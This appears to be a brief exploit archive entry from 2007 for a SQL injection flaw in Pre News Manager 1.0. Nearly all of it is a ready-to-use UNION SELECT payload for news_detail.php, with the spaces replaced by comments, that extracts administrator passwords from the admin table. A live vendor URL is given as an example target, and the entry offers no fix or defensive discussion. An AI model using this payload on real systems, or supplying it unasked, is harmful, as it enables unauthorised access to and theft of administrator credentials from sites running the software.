id: 1822
date: 05/02/2007
title: Pre News Manager 1.0 Remote SQL Injection Vulnerability
author: xoron
cves: 

=======================================================
Pre News Manager 1.0 Remote SQL Injection Vulnerability
=======================================================



==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================



#  0day.today [2023-03-27]  #